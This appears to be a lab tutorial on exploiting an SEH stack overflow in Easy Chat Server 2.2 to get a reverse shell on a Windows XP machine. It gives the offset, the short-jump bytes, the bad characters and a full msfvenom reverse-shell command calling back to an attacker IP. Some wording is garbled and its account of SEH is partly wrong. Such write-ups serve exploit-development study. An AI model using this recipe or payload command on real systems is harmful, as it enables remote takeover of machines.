A SEH stack overflow vulnerability exists in the Easy Chat Server 2.2 authentication method through which we can send malicious data in the user and pass parameter which stores in the stack as the input uses SEH to manage the exception. We an exploit for this application from scratch to a fully working exploit which gives reverse shell of the victim's machine remotely.
Structured Exception Handler (SEH)
An exception is an event that occurs during the execution of a program, and requires the execution of code outside the normal flow of control.
Structured exception handling is a mechanism for handling both hardware and software exceptions. Therefore, your code will handle hardware and software exceptions identically. Structured exception handling enables you to have complete control over the handling of exceptions, provides support for debuggers, and is usable across all programming languages and machines. Vectored exception handling is an extension to structured exception handling.
The system also supports termination handling, which enables you to ensure that whenever a guarded body of code is executed, a specified block of termination code is also executed.
Buffer Overflow with SEH
If an application is working with SEH, then, our simple buffer overflow with EIP overwriting will not work, as, the SEH converts all the data into zero to stop the exploiter from injecting their codes in the program. We also need to check the bad characters in the program which will terminates the execution of our shell_code. This can be done by sending all possible hex vaiables.
But, there is also a vulnerability available in the SEH, as, we now working by changing the Exception Handler location instead of EIP. We sends the bunch of junk data into the program memory and follow the SEH Chain for the corruption or breaking in the chain of the EH. Then, find out the linkage file without the SAFE SEH for the POP POP RETN sequence. Then, we overwrite the next ERR pointer with '\xEB\x06\x90\x90' to jump over the EH pointer directly to our shell_code.
Attacker's Machine : Kali Linux 19.1
Victim's Machine : Windows XP PRO SP3
VulnApp : Easy Chat Server 2.2
So, our exploitation part begins. We installed our vulnerable application in our Windows machine and Immunity Debugger to debug our application during the running process of the program.
We started our Immunity Debugger and open our application for the complete view on the background processes done by the application or checks the behaviour of the application when we try to exploit it.
We run the application in the debugger and it makes it in the initial state of the program.
As this is the Remote Buffer Overflow, we use our Attacker's Machine to create the remote working exploit. We gather the required header information used by the program and creates a buffer of the continuous pattern of 'A' of 2000. Then, sends the data to the program by running the exploit.
After the completion of the exploit, our program stopped at the Access violation error while accessing the load of A's in the program.
Now, check the SEH chain of the program at the current state and it shows that it is broken and overwritten with our 'A'. It seems to be more interesting as we now need to use SEH for the code execution.
Follow the SEH in the stack, it shows us that all the pointers is overwritten with our load of 'A'. The EH and ERR pointer is also written with our junk data.
Now, we use msf-pattern_create to create a continuous string of dissimilar data to check the offset of the EH part.
We restart the program and run our exploit and sends random junk to the program and checks the SEH chain again. Its again corrupted but with some random string.
Again follows the SEH in the stack and got random strings to check for the offset.
We use msf-pattern_offset to check the offset length by query the random string from the stack. We found offset length as 216.
Now to verify our query, we create a string of A's of length 216, B of length 4, C of length 4 and 'A' of length of 2000 as junk data.
Again restart the program and run the exploit. Checks the SEH chain and again its corrupted, but this time, it is corrupted with the location of the 4 C's. Follows the SEH in stack and got EH is written with C and ERR is written with B.
Now, we need to find the linked file location without SAFE SEH protection. We used pvefindaddr tool in Immunity Debugger to find it using command '!pvefindaddr nosafeseh'. This gives us 3 linked file address with nosafeseh at the current state and we need to choose the linked file which location start without bad characters like '\x00'. We used the first one.
Restart the program in debugger, and load the linked file using Executable Modules options in the Debugger. We need to find the POP POP RETN sequence in the file.
Use search of command sequence option to search the sequence as:
Use CTRL+L to search for next to find out the sequence location which doesn't contain any bad chars like '\x00'. We found a sequence whose memory location doesn't contain any bad chars.
We added the location at the location of C in the little endian form and '\xEB\x06\x90\x90' in the location of the B.
Now, we need to find out the bad characters in the program which terminates the program execution. We load the complete sequence of hex values and send it to the program to check the bad characters which breaks the hex sequence.
After the successful method of finding the bad characters in the program, we found the bad chars:
Now, we can move to the payload creation for the reverse shell of the victim's machine. We use msfvenom to create the one:
msfvenom -p windows/shell_reverse_tcp lhost=192.168.133.145 lport=4444 -f python -a x86 -b "\x00\x0a\x0d\x20"
We added the payload to the exploit at the location of junk data at the end of the buffer of size 2000.
Now run the program without the debugger to run as a regular program.
As soon as we start listener and run the exploit code, we got a reverse shell of the victim's machine.